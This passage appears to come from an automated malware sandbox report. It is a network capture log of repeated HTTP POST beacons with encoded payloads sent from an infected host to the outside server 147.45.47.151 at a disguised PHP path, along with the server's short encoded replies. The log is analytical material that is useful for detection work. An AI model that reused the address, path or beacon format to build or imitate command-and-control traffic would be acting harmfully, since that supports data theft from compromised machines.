                                                                                          Date: Tue, 10 Dec 2024 06:30:05 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.8 | 49941 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:05.779212952 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:06.169872999 CET | 2512 | OUT | Data Raw: 57 5a 5f 5c 5b 5b 50 5e 58 57 5a 57 52 56 51 5d 5b 51 5d 48 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_\[[P^XWZWRVQ][Q]HWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&,/!)55%Z*3??0)# -%\++<=*4"0-.\%!Z+(
Dec 10, 2024 07:30:07.040911913 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:07.276443958 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.8 | 49943 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:07.514744043 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:07.873151064 CET | 2504 | OUT | Data Raw: 57 5f 5f 5d 5e 58 55 5d 58 57 5a 57 52 55 51 50 5b 59 5d 47 57 51 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__]^XU]XWZWRUQP[Y]GWQP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^2?+ **T#%>(=/^%?0*"&(8)]5^#2'Z99.\%!Z+4
Dec 10, 2024 07:30:08.775341988 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:09.008654118 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.8 | 49948 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:08.408587933 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1980
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:08.756890059 CET | 1980 | OUT | Data Raw: 52 5a 5a 5d 5e 5c 55 5e 58 57 5a 57 52 54 51 52 5b 50 5d 44 57 50 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZZ]^\U^XWZWRTQR[P]DWPPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&<4^#*.V#&!(>' X$:3"?^ V*)X42'X9.\%!Z+
Dec 10, 2024 07:30:09.670428991 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:09.904508114 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:09 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 22 39 24 05 31 23 0a 1e 3b 31 06 0f 32 03 3f 08 3e 21 32 1b 27 2b 27 5f 2e 21 27 55 3e 2e 22 02 29 39 38 57 2a 3f 0e 0e 33 0f 21 46 0c 1d 24 15 27 2b 22 15 24 2d 23 59 24 3c 20 00 30 1c 15 58 29 55 24 16 34 23 30 07 33 23 3b 0e 3b 03 2e 55 2f 1c 25 1c 2b 32 32 1e 31 02 22 57 0d 12 27 16 24 20 3a 07 34 0c 0c 51 21 31 2c 56 29 35 33 05 27 58 24 01 36 29 22 02 33 22 28 5b 23 09 34 5b 28 38 22 11 24 3e 31 0b 27 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%"9$1#;12?>!2'+'_.!'U>.")98W*?3!F$'+"$-#Y$< 0X)U$4#03#;;.U/%+221"W'$ :4Q!1,V)53'X$6)"3"([#4[(8"$>1'; ^*+U?WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.8 | 49950 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:09.262430906 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:09.621140003 CET | 2512 | OUT | Data Raw: 57 5d 5f 5d 5b 59 50 5c 58 57 5a 57 52 52 51 5c 5b 5c 5d 41 57 54 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]_][YP\XWZWRRQ\[\]AWTPZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_14^4*%!5Y>>+]3??';6=[)+ Q>+!^#28:9.\%!Z+
Dec 10, 2024 07:30:10.522686958 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:10.756448984 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.8 | 49956 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:11.048543930 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:11.397686005 CET | 2504 | OUT | Data Raw: 57 50 5a 59 5e 5e 55 51 58 57 5a 57 52 55 51 52 5b 5e 5d 47 57 5f 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WPZY^^UQXWZWRUQR[^]GW_P\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&#\6P5X>%?<$4 =-X(8Q+8%Y43:.\%!Z+<
Dec 10, 2024 07:30:12.311304092 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:12.548527002 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:12 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.8 | 49961 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:12.796422958 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:13.173727036 CET | 2512 | OUT | Data Raw: 57 59 5a 5d 5b 59 55 5e 58 57 5a 57 52 50 51 56 5b 5c 5d 46 57 54 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WYZ][YU^XWZWRPQV[\]FWTPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%?Z \%61[)-7_3 \39'".%[);0S*:!2..\%!Z+0
Dec 10, 2024 07:30:14.060401917 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 07:30:14.292489052 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:13 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.2.8 | 49967 | 147.45.47.151 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 07:30:14.532773972 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
Dec 10, 2024 07:30:14.881912947 CET | 2512 | OUT | Data Raw: 52 5c 5f 5d 5e 55 55 51 58 57 5a 57 52 52 51 53 5b 5b 5d 41 57 52 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_]^UUQXWZWRRQS[[]AWRP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z%< *)"&5(.Z%?#$'5=&++?=;44-.\%!Z+
Dec 10, 2024 07:30:15.792784929 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:16.028598070 CET  200                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID  Source IP    Source Port  Destination IP  Destination Port
84          192.168.2.8  49969        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:15.059662104 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:15.413217068 CET2004OUTData Raw: 52 5d 5a 5e 5e 58 55 59 58 57 5a 57 52 51 51 56 5b 51 5d 46 57 5e 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]Z^^XUYXWZWRQQV[Q]FW^P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\%?(!*%!69[(>#$/'*$5&?3*86 !499.\%!Z+4
Dec 10, 2024 07:30:16.341362000 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:16.578779936 CET  349                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 34 39 24 00 26 33 28 1f 2f 31 0e 0f 27 3e 27 41 3d 32 2e 5c 31 5e 3f 5a 2d 0c 3f 54 3e 2d 32 01 29 3a 20 55 3e 3f 2f 57 24 35 21 46 0c 1d 24 5c 30 5d 32 5e 24 2e 2f 14 24 11 0d 5a 27 31 24 04 29 30 3b 0b 21 23 3f 5b 24 30 23 09 2c 03 3a 13 38 25 00 09 2a 54 2d 0f 25 28 22 57 0d 12 27 19 31 09 39 5f 34 0b 3a 51 36 08 20 1f 28 26 38 5b 33 58 28 03 35 03 36 02 30 31 0e 5f 23 09 38 5a 2b 2b 26 10 25 3e 22 56 27 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%49$&3(/1'>'A=2.\1^?Z-?T>-2): U>?/W$5!F$\0]2^$./$Z'1$)0;!#?[$0#,:8%*T-%("W'19_4:Q6 (&8[3X(5601_#8Z++&%>"V' ^*+U?WT0


Session ID  Source IP    Source Port  Destination IP  Destination Port
85          192.168.2.8  49970        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:16.272553921 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:16.632049084 CET2512OUTData Raw: 57 5c 5a 5d 5e 55 50 59 58 57 5a 57 52 53 51 53 5b 51 5d 41 57 52 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\Z]^UPYXWZWRSQS[Q]AWRPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&([ 6W!>+'/+3:$T!=-Y+/*]!!"3/9.\%!Z+<
Dec 10, 2024 07:30:17.529448032 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:17.764450073 CET  200                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID  Source IP    Source Port  Destination IP  Destination Port
86          192.168.2.8  49976        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:18.073462963 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:18.428797960 CET2512OUTData Raw: 57 5d 5f 5d 5b 5f 55 5d 58 57 5a 57 52 54 51 5d 5b 58 5d 43 57 54 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W]_][_U]XWZWRTQ][X]CWTPZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]1Y+4-56)>X40<'3$R .-)($V>%Y 2X-9.\%!Z+
Dec 10, 2024 07:30:19.342299938 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:19.576662064 CET  200                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID  Source IP    Source Port  Destination IP  Destination Port
87          192.168.2.8  49982        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:19.812114954 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:20.163121939 CET2512OUTData Raw: 52 5b 5f 5b 5b 5c 55 5f 58 57 5a 57 52 5d 51 55 5b 51 5d 44 57 5f 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_[[\U_XWZWR]QU[Q]DW_PY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^&$ U66_>', $#"2)8*8"# :.\%!Z+
Dec 10, 2024 07:30:21.072921991 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:21.312171936 CET  200                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID  Source IP    Source Port  Destination IP  Destination Port
88          192.168.2.8  49988        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:21.550611973 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:21.897646904 CET2512OUTData Raw: 52 5c 5f 5e 5b 5b 55 50 58 57 5a 57 52 5c 51 55 5b 59 5d 43 57 56 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_^[[UPXWZWR\QU[Y]CWVP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"]%?$^#6T"!>=?\'<?3$">1[<8,W)41'[9.\%!Z+
Dec 10, 2024 07:30:22.817718983 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:23.059109926 CET  200                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


Session ID  Source IP    Source Port  Destination IP  Destination Port
89          192.168.2.8  49989        147.45.47.151   80
Timestamp                            Bytes transferred  Direction  Data
Dec 10, 2024 07:30:21.731026888 CET  320                OUT        POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:30:22.088767052 CET2004OUTData Raw: 52 5b 5f 53 5e 58 55 50 58 57 5a 57 52 56 51 5d 5b 50 5d 49 57 56 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_S^XUPXWZWRVQ][P]IWVPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^%,,^7"55:>=,'?$\3(5.=Y<(,V>=Y423Z9.\%!Z+(
Dec 10, 2024 07:30:22.991939068 CET  25                 IN         HTTP/1.1 100 Continue
Dec 10, 2024 07:30:23.224160910 CET  349                IN         HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:30:22 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
